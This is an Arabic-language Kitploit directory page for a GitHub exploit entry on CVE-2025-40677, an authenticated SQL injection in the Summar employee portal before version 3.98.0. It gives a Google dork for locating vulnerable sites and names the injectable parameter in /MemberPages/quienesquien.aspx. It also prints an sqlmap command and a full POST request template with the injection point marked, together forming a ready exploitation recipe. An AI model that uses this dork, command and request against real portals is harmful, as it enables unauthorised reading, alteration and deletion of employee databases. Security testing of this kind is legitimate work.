Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-40677 — بوابة موظفي Summar قبل الإصدار 3.98.0 حقن SQL مُصادَق - CVE-2025-40677 | Kitploit
أدوات/GitHubGitHub/petergabaldon/cve-2025-40677
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubpetergabaldon/cve-2025-40677

CVE-2025-40677

بوابة موظفي Summar قبل الإصدار 3.98.0 حقن SQL مُصادَق - CVE-2025-40677

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عنوان الثغرة: بوابة موظف سممار قبل الإصدار 3.98.0 حقن SQL مصادق عليه - CVE-2025-40677

بحث Google: inurl:"/MemberPages/quienesquien.aspx"

التاريخ: 09/22/2025

مؤلف الاستغلال: Peter Gabaldon - https://pgj11.com/

الصفحة الرئيسية للبائع: https://www.summar.es/

رابط البرنامج: https://www.summar.es/software-recursos-humanos/

الإصدار: < 3.98.0

تم الاختبار على: Kali

CVE : CVE-2025-40677

الوصف: ثغرة حقن SQL في بوابة الموظف لبرنامج Summar. تسمح هذه الثغرة للمهاجم باسترجاع وإنشاء وتحديث وحذف قاعدة البيانات عن طريق إرسال طلب POST باستخدام المعامل “ctl00$ContentPlaceHolder1$filtroNombre” في “/MemberPages/quienesquien.aspx”.

root@kitploit:~
$ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"

POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
 
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&
تنزيل الأداة